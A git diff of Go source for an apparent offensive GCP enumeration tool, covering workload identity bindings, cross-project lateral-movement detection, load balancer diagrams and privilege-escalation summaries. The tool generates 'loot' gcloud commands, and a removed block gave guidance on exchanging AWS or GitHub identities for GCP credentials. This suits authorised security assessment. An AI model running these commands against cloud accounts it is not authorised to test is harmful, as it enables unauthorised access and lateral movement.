granted ON the service account - saPolicy, err := m.getServiceAccountPolicy(ctx, sa.Name) + // Get the IAM policy ON the service account resource (not project-level) + saResource := fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, sa.Email) + policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy(saResource).Context(ctx).Do() if err != nil { continue } - // Look for members with workloadIdentityUser role - for _, binding := range saPolicy { + for _, binding := range policy.Bindings { if binding.Role == "roles/iam.workloadIdentityUser" { for _, member := range binding.Members { - // Parse member to extract namespace and KSA - // Format: serviceAccount:[PROJECT_ID].svc.id.goog[NAMESPACE/KSA_NAME] if strings.HasPrefix(member, "serviceAccount:") && strings.Contains(member, ".svc.id.goog") { ns, ksa := parseWorkloadIdentityMember(member) if ns != "" && ksa != "" { @@ -377,10 +274,7 @@ func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Contex GCPSARoles: sa.Roles, BindingType: "workloadIdentityUser", } - - // Check if high privilege wib.IsHighPrivilege = isHighPrivilegeServiceAccount(sa) - bindings = append(bindings, wib) } } @@ -392,24 +286,11 @@ func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Contex return bindings } -// getServiceAccountPolicy gets IAM policy for a service account -func (m *WorkloadIdentityModule) getServiceAccountPolicy(ctx context.Context, saName string) ([]IAMService.PolicyBinding, error) { - iamSvc := IAMService.New() - - // Get the service account's IAM policy - // This requires calling the IAM API directly - // For now, we'll return the roles from the project-level bindings - return iamSvc.Policies(extractProjectFromSAName(saName), "project") -} - // parseWorkloadIdentityMember parses a workload identity member string // Format: serviceAccount:[PROJECT_ID].svc.id.goog[NAMESPACE/KSA_NAME] func parseWorkloadIdentityMember(member string) (namespace, serviceAccount string) { - // Remove serviceAccount: prefix member = strings.TrimPrefix(member, "serviceAccount:") - // Find the workload pool and extract namespace/SA - // Format: PROJECT_ID.svc.id.goog[NAMESPACE/KSA_NAME] bracketStart := strings.Index(member, "[") bracketEnd := strings.Index(member, "]") @@ -426,16 +307,6 @@ func parseWorkloadIdentityMember(member string) (namespace, serviceAccount strin return "", "" } -// extractProjectFromSAName extracts project ID from service account name -func extractProjectFromSAName(saName string) string { - // Format: projects/PROJECT_ID/serviceAccounts/SA_EMAIL - parts := strings.Split(saName, "/") - if len(parts) >= 2 { - return parts[1] - } - return "" -} - // isHighPrivilegeServiceAccount checks if a service account has high-privilege roles func isHighPrivilegeServiceAccount(sa IAMService.ServiceAccountInfo) bool { highPrivRoles := map[string]bool{ @@ -473,14 +344,12 @@ func (m *WorkloadIdentityModule) addClusterToLoot(projectID string, cwi ClusterW "# GKE CLUSTER: %s\n"+ "# ==========================================\n"+ "# Location: %s\n"+ - "# Project: %s\n"+ "# Workload Pool: %s\n"+ "# Node Pools with WI: %d/%d\n"+ "\n# Get cluster credentials:\n"+ "gcloud container clusters get-credentials %s --zone=%s --project=%s\n\n", cwi.ClusterName, cwi.Location, - cwi.ProjectID, cwi.WorkloadPool, cwi.NodePoolsWithWI, cwi.TotalNodePools, @@ -505,15 +374,13 @@ func (m *WorkloadIdentityModule) addBindingToLoot(projectID string, binding Work "# ------------------------------------------\n"+ "# K8s SA BINDING: %s/%s -> %s%s\n"+ "# ------------------------------------------\n"+ - "# Cluster: %s (%s)\n"+ - "# Project: %s\n", + "# Cluster: %s (%s)\n", binding.KubernetesNS, binding.KubernetesSA, binding.GCPServiceAccount, highPriv, binding.ClusterName, binding.ClusterLocation, - binding.ProjectID, ) if binding.IsHighPrivilege && len(binding.GCPSARoles) > 0 { @@ -533,127 +400,10 @@ func (m *WorkloadIdentityModule) addBindingToLoot(projectID string, binding Work ) } -func (m *WorkloadIdentityModule) addPoolToLoot(projectID string, pool workloadidentityservice.WorkloadIdentityPool) { - lootFile := m.LootMap[projectID]["workloadidentity-commands"] - if lootFile == nil { - return - } - status := "Active" - if pool.Disabled { - status = "Disabled" - } - lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ - "# FEDERATION POOL: %s\n"+ - "# ==========================================\n"+ - "# Project: %s\n"+ - "# Display Name: %s\n"+ - "# State: %s (%s)\n"+ - "# Description: %s\n"+ - "\n# Describe pool:\n"+ - "gcloud iam workload-identity-pools describe %s --location=global --project=%s\n\n"+ - "# List providers:\n"+ - "gcloud iam workload-identity-pools providers list --workload-identity-pool=%s --location=global --project=%s\n\n", - pool.PoolID, - pool.ProjectID, - pool.DisplayName, - pool.State, status, - pool.Description, - pool.PoolID, pool.ProjectID, - pool.PoolID, pool.ProjectID, - ) -} - -func (m *WorkloadIdentityModule) addProviderToLoot(projectID string, provider workloadidentityservice.WorkloadIdentityProvider) { - lootFile := m.LootMap[projectID]["workloadidentity-commands"] - if lootFile == nil { - return - } - lootFile.Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ - "# PROVIDER: %s/%s (%s)\n"+ - "# ------------------------------------------\n"+ - "# Project: %s\n", - provider.PoolID, provider.ProviderID, - provider.ProviderType, - provider.ProjectID, - ) - - if provider.ProviderType == "AWS" { - lootFile.Contents += fmt.Sprintf( - "# AWS Account: %s\n", provider.AWSAccountID) - } else if provider.ProviderType == "OIDC" { - lootFile.Contents += fmt.Sprintf( - "# OIDC Issuer: %s\n", provider.OIDCIssuerURI) - } - - if provider.AttributeCondition != "" { - lootFile.Contents += fmt.Sprintf( - "# Attribute Condition: %s\n", provider.AttributeCondition) - } else { - lootFile.Contents += "# Attribute Condition: NONE\n" - } - - lootFile.Contents += fmt.Sprintf( - "\n# Describe provider:\n"+ - "gcloud iam workload-identity-pools providers describe %s --workload-identity-pool=%s --location=global --project=%s\n\n", - provider.ProviderID, provider.PoolID, provider.ProjectID, - ) - - // Add exploitation guidance based on provider type - switch provider.ProviderType { - case "AWS": - lootFile.Contents += fmt.Sprintf( - "# From AWS account %s, exchange credentials:\n"+ - "# gcloud iam workload-identity-pools create-cred-config \\\n"+ - "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ - "# --aws --output-file=gcp-creds.json\n\n", - provider.AWSAccountID, - provider.ProjectID, provider.PoolID, provider.ProviderID, - ) - case "OIDC": - if strings.Contains(provider.OIDCIssuerURI, "github") { - lootFile.Contents += fmt.Sprintf( - "# From GitHub Actions workflow, add:\n"+ - "# permissions:\n"+ - "# id-token: write\n"+ - "# contents: read\n"+ - "# Then use:\n"+ - "# gcloud iam workload-identity-pools create-cred-config \\\n"+ - "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ - "# --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n"+ - "# --output-file=gcp-creds.json\n\n", - provider.ProjectID, provider.PoolID, provider.ProviderID, - ) - } - } -} - -func (m *WorkloadIdentityModule) addFederatedBindingToLoot(projectID string, binding workloadidentityservice.FederatedIdentityBinding) { - lootFile := m.LootMap[projectID]["workloadidentity-commands"] - if lootFile == nil { - return - } - lootFile.Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ - "# FEDERATED BINDING\n"+ - "# ------------------------------------------\n"+ - "# Pool: %s\n"+ - "# GCP Service Account: %s\n"+ - "# External Subject: %s\n"+ - "# Project: %s\n\n", - binding.PoolID, - binding.GCPServiceAccount, - binding.ExternalSubject, - binding.ProjectID, - ) -} - // ------------------------------ // Output Generation // ------------------------------ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Decide between hierarchical and flat output if m.Hierarchy != nil && !m.FlatOutput { m.writeHierarchicalOutput(ctx, logger) } else { @@ -661,19 +411,15 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } } -// writeHierarchicalOutput writes output to per-project directories func (m *WorkloadIdentityModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { - // Build hierarchical output data outputData := internal.HierarchicalOutputData{ OrgLevelData: make(map[string]internal.CloudfoxOutput), ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // Build project-level outputs for projectID := range m.ProjectClusters { tables := m.buildTablesForProject(projectID) - // Collect loot for this project var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { @@ -686,10 +432,8 @@ func (m *WorkloadIdentityModule) writeHierarchicalOutput(ctx context.Context, lo outputData.ProjectLevelData[projectID] = WorkloadIdentityOutput{Table: tables, Loot: lootFiles} } - // Create path builder using the module's hierarchy pathBuilder := m.BuildPathBuilder() - // Write using hierarchical output err := internal.HandleHierarchicalOutputSmart( "gcp", m.Format, @@ -704,17 +448,12 @@ func (m *WorkloadIdentityModule) writeHierarchicalOutput(ctx context.Context, lo } } -// writeFlatOutput writes all output to a single directory (legacy mode) func (m *WorkloadIdentityModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { allClusters := m.getAllClusters() allBindings := m.getAllBindings() - allPools := m.getAllPools() - allProviders := m.getAllProviders() - allFederatedBindings := m.getAllFederatedBindings() - tables := m.buildTables(allClusters, allBindings, allPools, allProviders, allFederatedBindings) + tables := m.buildTables(allClusters, allBindings) - // Collect all loot files var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { @@ -729,7 +468,6 @@ func (m *WorkloadIdentityModule) writeFlatOutput(ctx context.Context, logger int Loot: lootFiles, } - // Write output using HandleOutputSmart with scope support scopeNames := make([]string, len(m.ProjectIDs)) for i, id := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(id) @@ -757,20 +495,13 @@ func (m *WorkloadIdentityModule) writeFlatOutput(ctx context.Context, logger int func (m *WorkloadIdentityModule) buildTablesForProject(projectID string) []internal.TableFile { clusters := m.ProjectClusters[projectID] bindings := m.ProjectBindings[projectID] - pools := m.ProjectPools[projectID] - providers := m.ProjectProviders[projectID] - federatedBindings := m.ProjectFederatedBindings[projectID] - - return m.buildTables(clusters, bindings, pools, providers, federatedBindings) + return m.buildTables(clusters, bindings) } // buildTables builds all tables from the given data func (m *WorkloadIdentityModule) buildTables( clusters []ClusterWorkloadIdentity, bindings []WorkloadIdentityBinding, - pools []workloadidentityservice.WorkloadIdentityPool, - providers []workloadidentityservice.WorkloadIdentityProvider, - federatedBindings []workloadidentityservice.FederatedIdentityBinding, ) []internal.TableFile { var tables []internal.TableFile @@ -795,7 +526,6 @@ func (m *WorkloadIdentityModule) buildTables( workloadPool = cwi.WorkloadPool } - // Format as "X of Y" for clarity nodePoolsWI := fmt.Sprintf("%d of %d", cwi.NodePoolsWithWI, cwi.TotalNodePools) clustersBody = append(clustersBody, []string{ @@ -808,7 +538,6 @@ func (m *WorkloadIdentityModule) buildTables( }) } - // Only add clusters table if there are clusters if len(clustersBody) > 0 { tables = append(tables, internal.TableFile{ Name: "workload-identity-clusters", @@ -835,7 +564,6 @@ func (m *WorkloadIdentityModule) buildTables( highPriv = "Yes" } - // Check attack paths for the GCP service account attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, binding.GCPServiceAccount) bindingsBody = append(bindingsBody, []string{ @@ -849,7 +577,6 @@ func (m *WorkloadIdentityModule) buildTables( }) } - // Add bindings table if there are any if len(bindingsBody) > 0 { tables = append(tables, internal.TableFile{ Name: "workload-identity-bindings", @@ -858,114 +585,5 @@ func (m *WorkloadIdentityModule) buildTables( }) } - // ============================ - // Workload Identity Federation tables - // ============================ - - // Federation Pools table - if len(pools) > 0 { - poolsHeader := []string{ - "Project", - "Pool ID", - "Display Name", - "State", - "Disabled", - } - - var poolsBody [][]string - for _, pool := range pools { - disabled := "No" - if pool.Disabled { - disabled = "Yes" - } - poolsBody = append(poolsBody, []string{ - m.GetProjectName(pool.ProjectID), - pool.PoolID, - pool.DisplayName, - pool.State, - disabled, - }) - } - - tables = append(tables, internal.TableFile{ - Name: "wi-federation-pools", - Header: poolsHeader, - Body: poolsBody, - }) - } - - // Federation Providers table - if len(providers) > 0 { - providersHeader := []string{ - "Project", - "Pool", - "Provider", - "Type", - "OIDC Issuer / AWS Account", - "Access Condition", - } - - var providersBody [][]string - for _, p := range providers { - issuerOrAccount := "-" - if p.ProviderType == "AWS" { - issuerOrAccount = p.AWSAccountID - } else if p.ProviderType == "OIDC" { - issuerOrAccount = p.OIDCIssuerURI - } - - attrCond := "-" - if p.AttributeCondition != "" { - attrCond = p.AttributeCondition - } - - providersBody = append(providersBody, []string{ - m.GetProjectName(p.ProjectID), - p.PoolID, - p.ProviderID, - p.ProviderType, - issuerOrAccount, - attrCond, - }) - } - - tables = append(tables, internal.TableFile{ - Name: "wi-federation-providers", - Header: providersHeader, - Body: providersBody, - }) - } - - // Federated bindings table - if len(federatedBindings) > 0 { - fedBindingsHeader := []string{ - "Project", - "Pool", - "GCP Service Account", - "External Identity", - "SA Attack Paths", - } - - var fedBindingsBody [][]string - for _, fb := range federatedBindings { - // Check attack paths for the GCP service account - attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, fb.GCPServiceAccount) - - fedBindingsBody = append(fedBindingsBody, []string{ - m.GetProjectName(fb.ProjectID), - fb.PoolID, - fb.GCPServiceAccount, - fb.ExternalSubject, - attackPaths, - }) - } - - tables = append(tables, internal.TableFile{ - Name: "wi-federated-bindings", - Header: fedBindingsHeader, - Body: fedBindingsBody, - }) - } - return tables } diff --git a/gcp/services/crossProjectService/crossProjectService.go b/gcp/services/crossProjectService/crossProjectService.go index 03328150..6ce5e10e 100644 --- a/gcp/services/crossProjectService/crossProjectService.go +++ b/gcp/services/crossProjectService/crossProjectService.go @@ -116,8 +116,9 @@ type CrossProjectPubSubExport struct { RiskReasons []string `json:"riskReasons"` } -// AnalyzeCrossProjectAccess analyzes cross-project IAM bindings for a set of projects -func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string) ([]CrossProjectBinding, error) { +// AnalyzeCrossProjectAccess analyzes cross-project IAM bindings for a set of projects. +// If orgCache is provided, it resolves project numbers to IDs for accurate detection. +func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string, orgCache *gcpinternal.OrgCache) ([]CrossProjectBinding, error) { ctx := context.Background() crmService, err := s.getResourceManagerService(ctx) @@ -142,7 +143,7 @@ func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string) ([] for _, binding := range policy.Bindings { for _, member := range binding.Members { - sourceProject := extractProjectFromMember(member) + sourceProject := extractProjectFromMember(member, orgCache) // Check if this is cross-project access if sourceProject != "" && sourceProject != targetProject { @@ -247,8 +248,9 @@ func (s *CrossProjectService) GetCrossProjectServiceAccounts(projectIDs []string return crossProjectSAs, nil } -// FindLateralMovementPaths identifies lateral movement paths between projects -func (s *CrossProjectService) FindLateralMovementPaths(projectIDs []string) ([]LateralMovementPath, error) { +// FindLateralMovementPaths identifies lateral movement paths between projects. +// If orgCache is provided, it resolves project numbers to IDs for accurate detection. +func (s *CrossProjectService) FindLateralMovementPaths(projectIDs []string, orgCache *gcpinternal.OrgCache) ([]LateralMovementPath, error) { ctx := context.Background() crmService, err := s.getResourceManagerService(ctx) @@ -274,7 +276,7 @@ func (s *CrossProjectService) FindLateralMovementPaths(projectIDs []string) ([]L // Find principals from source project that have access to target for _, binding := range policy.Bindings { for _, member := range binding.Members { - memberProject := extractProjectFromMember(member) + memberProject := extractProjectFromMember(member, orgCache) if memberProject == sourceProject { path := LateralMovementPath{ SourceProject: sourceProject, @@ -445,34 +447,83 @@ func (s *CrossProjectService) generateLateralMovementCommands(path LateralMoveme return commands } -// extractProjectFromMember extracts the project ID from a member string -func extractProjectFromMember(member string) string { - // serviceAccount:sa-name@project-id.iam.gserviceaccount.com - if strings.HasPrefix(member, "serviceAccount:") { - email := strings.TrimPrefix(member, "serviceAccount:") - // Format: name@project-id.iam.gserviceaccount.com - // or: project-id@project-id.iam.gserviceaccount.com - if strings.Contains(email, ".iam.gserviceaccount.com") { - parts := strings.Split(email, "@") - if len(parts) == 2 { - domain := parts[1] - projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") - return projectPart +// extractProjectFromMember extracts the project ID from a member string. +// If orgCache is provided, it resolves project numbers to IDs. +func extractProjectFromMember(member string, orgCache *gcpinternal.OrgCache) string { + if !strings.HasPrefix(member, "serviceAccount:") { + return "" + } + + email := strings.TrimPrefix(member, "serviceAccount:") + parts := strings.Split(email, "@") + if len(parts) != 2 { + return "" + } + + prefix := parts[0] + domain := parts[1] + + // Helper to resolve a project number to ID via OrgCache + resolveNumber := func(number string) string { + if orgCache != nil && orgCache.IsPopulated() { + if resolved := orgCache.GetProjectIDByNumber(number); resolved != "" { + return resolved } } - // App Engine default service accounts - if strings.Contains(email, "@appspot.gserviceaccount.com") { - parts := strings.Split(email, "@") - if len(parts) == 2 { - return strings.TrimSuffix(parts[1], ".appspot.gserviceaccount.com") + return "" // Can't resolve without cache + } + + // Pattern: name@project-id.iam.gserviceaccount.com (regular SAs) + // But NOT gcp-sa-* domains (those are Google service agents with project numbers) + if strings.HasSuffix(domain, ".iam.gserviceaccount.com") && !strings.HasPrefix(domain, "gcp-sa-") { + projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + return projectPart + } + + // Pattern: service-PROJECT_NUMBER@gcp-sa-*.iam.gserviceaccount.com + if strings.HasPrefix(domain, "gcp-sa-") && strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + number := prefix + if strings.HasPrefix(prefix, "service-") { + number = strings.TrimPrefix(prefix, "service-") + } + if resolved := resolveNumber(number); resolved != "" { + return resolved + } + return "" + } + + // Pattern: PROJECT_ID@appspot.gserviceaccount.com + if domain == "appspot.gserviceaccount.com" { + return prefix // This is already a project ID + } + + // Pattern: PROJECT_NUMBER-compute@developer.gserviceaccount.com + if strings.HasSuffix(domain, "developer.gserviceaccount.com") { + if idx := strings.Index(prefix, "-compute"); idx > 0 { + number := prefix[:idx] + if resolved := resolveNumber(number); resolved != "" { + return resolved } } - // Compute Engine default service accounts: project-number@project.iam.gserviceaccount.com - if strings.Contains(email, "-compute@developer.gserviceaccount.com") { - // Can't extract project ID from project number easily - return "" + return "" + } + + // Pattern: PROJECT_NUMBER@cloudservices.gserviceaccount.com + if domain == "cloudservices.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved } + return "" } + + // Pattern: PROJECT_NUMBER@cloudbuild.gserviceaccount.com + if domain == "cloudbuild.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved + } + return "" + } + return "" } diff --git a/gcp/services/diagramService/diagramService.go b/gcp/services/diagramService/diagramService.go old mode 100644 new mode 100755 index b8bc7f68..05bdde47 --- a/gcp/services/diagramService/diagramService.go +++ b/gcp/services/diagramService/diagramService.go @@ -216,6 +216,8 @@ type LoadBalancerInfo struct { Region string BackendServices []string SecurityPolicy string + // BackendDetails maps backend service name to its actual backends (instance groups, NEGs, etc.) + BackendDetails map[string][]string } // VPCPeeringInfo represents VPC peering for diagram purposes @@ -942,7 +944,7 @@ func DrawFirewallLegend(width int) string { // Load Balancer Diagram Functions // ======================================== -// DrawLoadBalancerDiagram generates an ASCII diagram showing load balancer architecture +// DrawLoadBalancerDiagram generates an ASCII diagram showing load balancer traffic flow func DrawLoadBalancerDiagram( loadBalancers []LoadBalancerInfo, projectID string, @@ -950,9 +952,9 @@ func DrawLoadBalancerDiagram( ) string { var sb strings.Builder - title := "LOAD BALANCER ARCHITECTURE" + title := "LOAD BALANCER TRAFFIC FLOW" if projectID != "" { - title = fmt.Sprintf("LOAD BALANCER ARCHITECTURE (Project: %s)", projectID) + title = fmt.Sprintf("LOAD BALANCER TRAFFIC FLOW (Project: %s)", projectID) } sb.WriteString(DrawBox(title, width)) @@ -968,20 +970,20 @@ func DrawLoadBalancerDiagram( } } - // Draw external load balancers + // Draw external load balancers with flow if len(externalLBs) > 0 { - sb.WriteString(drawLoadBalancerSection("EXTERNAL LOAD BALANCERS (Internet-facing)", externalLBs, width)) + sb.WriteString(drawLBFlowSection("EXTERNAL (Internet-facing)", externalLBs, width)) sb.WriteString("\n") } - // Draw internal load balancers + // Draw internal load balancers with flow if len(internalLBs) > 0 { - sb.WriteString(drawLoadBalancerSection("INTERNAL LOAD BALANCERS (Private)", internalLBs, width)) + sb.WriteString(drawLBFlowSection("INTERNAL (VPC-only)", internalLBs, width)) sb.WriteString("\n") } - // Draw architecture overview - sb.WriteString(drawLBArchitectureOverview(externalLBs, internalLBs, width)) + // Summary stats + sb.WriteString(drawLBSummary(externalLBs, internalLBs, width)) // Legend sb.WriteString(DrawLoadBalancerLegend(width)) @@ -989,7 +991,8 @@ func DrawLoadBalancerDiagram( return sb.String() } -func drawLoadBalancerSection(title string, lbs []LoadBalancerInfo, width int) string { +// drawLBFlowSection draws individual load balancer flows showing frontend -> backend +func drawLBFlowSection(title string, lbs []LoadBalancerInfo, width int) string { var sb strings.Builder sb.WriteString("┌") @@ -1000,73 +1003,144 @@ func drawLoadBalancerSection(title string, lbs []LoadBalancerInfo, width int) st sb.WriteString(strings.Repeat("─", width-2)) sb.WriteString("┤\n") - for _, lb := range lbs { - // Security indicator - securityLabel := "" - if lb.SecurityPolicy != "" { - securityLabel = " [Cloud Armor]" - } + for i, lb := range lbs { + // Draw flow for each load balancer + sb.WriteString(drawSingleLBFlow(lb, width)) - // Type and name - typeLine := fmt.Sprintf(" %s: %s (%s)%s", lb.Type, lb.Name, lb.Region, securityLabel) - if len(typeLine) > width-4 { - typeLine = typeLine[:width-7] + "..." + // Add separator between LBs (but not after the last one) + if i < len(lbs)-1 { + sb.WriteString("│") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("│\n") } - sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, typeLine)) + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") - // IP and Port - ipLine := fmt.Sprintf(" IP: %s:%s", lb.IPAddress, lb.Port) - sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, ipLine)) + return sb.String() +} - // Backend services - if len(lb.BackendServices) > 0 { - backends := strings.Join(lb.BackendServices, ", ") - if len(backends) > width-20 { - backends = backends[:width-23] + "..." +// drawSingleLBFlow draws a single load balancer's traffic flow +func drawSingleLBFlow(lb LoadBalancerInfo, width int) string { + var sb strings.Builder + + // Security indicator + armorLabel := "" + if lb.SecurityPolicy != "" { + armorLabel = " [Cloud Armor: " + lb.SecurityPolicy + "]" + } + + // LB name and type header + headerLine := fmt.Sprintf(" %s (%s, %s)%s", lb.Name, lb.Type, lb.Region, armorLabel) + if len(headerLine) > width-4 { + headerLine = headerLine[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, headerLine)) + sb.WriteString(DrawEmptyLine(width)) + + // Frontend (IP:Port) + frontendBox := fmt.Sprintf("%s:%s", lb.IPAddress, lb.Port) + + // Build backend lines with actual backend targets + var backendLines []string + if len(lb.BackendServices) == 0 { + backendLines = []string{"(no backends)"} + } else { + for _, beSvc := range lb.BackendServices { + // Check if we have detailed backend info + if lb.BackendDetails != nil { + if targets, ok := lb.BackendDetails[beSvc]; ok && len(targets) > 0 { + // Show backend service with its targets + backendLines = append(backendLines, fmt.Sprintf("%s:", beSvc)) + for _, target := range targets { + backendLines = append(backendLines, fmt.Sprintf(" -> %s", target)) + } + } else { + backendLines = append(backendLines, beSvc) + } + } else { + backendLines = append(backendLines, beSvc) } - backendLine := fmt.Sprintf(" Backends: %s", backends) - sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, backendLine)) } + } - sb.WriteString(DrawEmptyLine(width)) + // Calculate dynamic backend width based on longest line + backendWidth := 35 + for _, line := range backendLines { + if len(line)+4 > backendWidth { + backendWidth = len(line) + 4 + } + } + // Cap at reasonable max + maxBackendWidth := width - 35 + if backendWidth > maxBackendWidth { + backendWidth = maxBackendWidth } - sb.WriteString("└") - sb.WriteString(strings.Repeat("─", width-2)) - sb.WriteString("┘\n") + frontendWidth := 23 + arrowWidth := 7 + padding := width - frontendWidth - backendWidth - arrowWidth - 8 + if padding < 0 { + padding = 0 + } + + // Top of boxes + sb.WriteString(fmt.Sprintf("│ ┌%s┐ ┌%s┐%s│\n", + strings.Repeat("─", frontendWidth), + strings.Repeat("─", backendWidth), + strings.Repeat(" ", padding))) + + // Frontend label + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │ %-*s │%s│\n", + frontendWidth-2, "FRONTEND", + backendWidth-2, "BACKEND SERVICE -> TARGETS", + strings.Repeat(" ", padding))) + + // Separator with arrow + sb.WriteString(fmt.Sprintf("│ ├%s┤ ───> ├%s┤%s│\n", + strings.Repeat("─", frontendWidth), + strings.Repeat("─", backendWidth), + strings.Repeat(" ", padding))) + + // IP:Port line with first backend + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │ %-*s │%s│\n", + frontendWidth-2, frontendBox, + backendWidth-2, safeGetIndex(backendLines, 0), + strings.Repeat(" ", padding))) + + // Additional backend lines + for i := 1; i < len(backendLines); i++ { + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │ %-*s │%s│\n", + frontendWidth-2, "", + backendWidth-2, backendLines[i], + strings.Repeat(" ", padding))) + } + + // Bottom of boxes + sb.WriteString(fmt.Sprintf("│ └%s┘ └%s┘%s│\n", + strings.Repeat("─", frontendWidth), + strings.Repeat("─", backendWidth), + strings.Repeat(" ", padding))) + + sb.WriteString(DrawEmptyLine(width)) return sb.String() } -func drawLBArchitectureOverview(externalLBs, internalLBs []LoadBalancerInfo, width int) string { +// drawLBSummary draws summary statistics +func drawLBSummary(externalLBs, internalLBs []LoadBalancerInfo, width int) string { var sb strings.Builder sb.WriteString("┌") sb.WriteString(strings.Repeat("─", width-2)) sb.WriteString("┐\n") - sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "ARCHITECTURE OVERVIEW")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "SUMMARY")) sb.WriteString("├") sb.WriteString(strings.Repeat("─", width-2)) sb.WriteString("┤\n") - sb.WriteString("│ │\n") - - if len(externalLBs) > 0 { - sb.WriteString("│ ┌─────────────┐ ┌─────────────────────┐ ┌─────────────┐ │\n") - sb.WriteString("│ │ INTERNET │ ─────> │ External LB │ ─────> │ Backends │ │\n") - sb.WriteString("│ │ │ │ (Cloud Armor) │ │ (GCE/GKE) │ │\n") - sb.WriteString("│ └─────────────┘ └─────────────────────┘ └─────────────┘ │\n") - sb.WriteString("│ │\n") - } - - if len(internalLBs) > 0 { - sb.WriteString("│ ┌─────────────┐ ┌─────────────────────┐ ┌─────────────┐ │\n") - sb.WriteString("│ │ VPC │ ─────> │ Internal LB │ ─────> │ Backends │ │\n") - sb.WriteString("│ │ (Private) │ │ (Regional) │ │ (Private) │ │\n") - sb.WriteString("│ └─────────────┘ └─────────────────────┘ └─────────────┘ │\n") - sb.WriteString("│ │\n") - } - // Count with Cloud Armor armorCount := 0 for _, lb := range externalLBs { @@ -1075,15 +1149,18 @@ func drawLBArchitectureOverview(externalLBs, internalLBs []LoadBalancerInfo, wid } } - statsLine := fmt.Sprintf(" External: %d Internal: %d With Cloud Armor: %d", len(externalLBs), len(internalLBs), armorCount) + statsLine := fmt.Sprintf(" External LBs: %d Internal LBs: %d With Cloud Armor: %d/%d", + len(externalLBs), len(internalLBs), armorCount, len(externalLBs)) sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, statsLine)) if len(externalLBs) > 0 && armorCount == 0 { - warningLine := " ⚠ No external load balancers have Cloud Armor protection" + warningLine := " ⚠ WARNING: No external load balancers have Cloud Armor protection" + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, warningLine)) + } else if len(externalLBs) > armorCount { + warningLine := fmt.Sprintf(" ⚠ WARNING: %d external load balancer(s) missing Cloud Armor", len(externalLBs)-armorCount) sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, warningLine)) } - sb.WriteString("│ │\n") sb.WriteString("└") sb.WriteString(strings.Repeat("─", width-2)) sb.WriteString("┘\n") @@ -1091,6 +1168,25 @@ func drawLBArchitectureOverview(externalLBs, internalLBs []LoadBalancerInfo, wid return sb.String() } +// truncateString truncates a string to maxLen, adding "..." if needed +func truncateString(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + if maxLen <= 3 { + return s[:maxLen] + } + return s[:maxLen-3] + "..." +} + +// safeGetIndex safely gets an index from a slice, returning empty string if out of bounds +func safeGetIndex(slice []string, index int) string { + if index < len(slice) { + return slice[index] + } + return "" +} + // DrawLoadBalancerLegend draws the load balancer diagram legend func DrawLoadBalancerLegend(width int) string { var sb strings.Builder diff --git a/gcp/services/foxmapperService/foxmapperService.go b/gcp/services/foxmapperService/foxmapperService.go old mode 100644 new mode 100755 index 596669c5..99b395ee --- a/gcp/services/foxmapperService/foxmapperService.go +++ b/gcp/services/foxmapperService/foxmapperService.go @@ -205,6 +205,10 @@ type PrincipalAccessFile struct { ViaEdge bool `json:"via_edge"` EdgePath []string `json:"edge_path,omitempty"` Resource string `json:"resource,omitempty"` + // Scope information (may be in JSON or derived from Resource) + ScopeType string `json:"scope_type,omitempty"` + ScopeID string `json:"scope_id,omitempty"` + ScopeName string `json:"scope_name,omitempty"` } // New creates a new FoxMapperService @@ -682,7 +686,7 @@ func (s *FoxMapperService) GetAttackSummary(principal string) string { highestLevel = "folder" } } - return fmt.Sprintf("Privesc→%s (%d hops)", highestLevel, shortestHops) + return fmt.Sprintf("Privesc->%s (%d hops)", highestLevel, shortestHops) } return "Privesc" } @@ -743,7 +747,7 @@ func (s *FoxMapperService) GetPrivescSummary() map[string]interface{} { // FormatPrivescPath formats a privesc path for display func FormatPrivescPath(path PrivescPath) string { var sb strings.Builder - sb.WriteString(fmt.Sprintf("%s → %s (%d hops)\n", path.Source, path.Destination, path.HopCount)) + sb.WriteString(fmt.Sprintf("%s -> %s (%d hops)\n", path.Source, path.Destination, path.HopCount)) 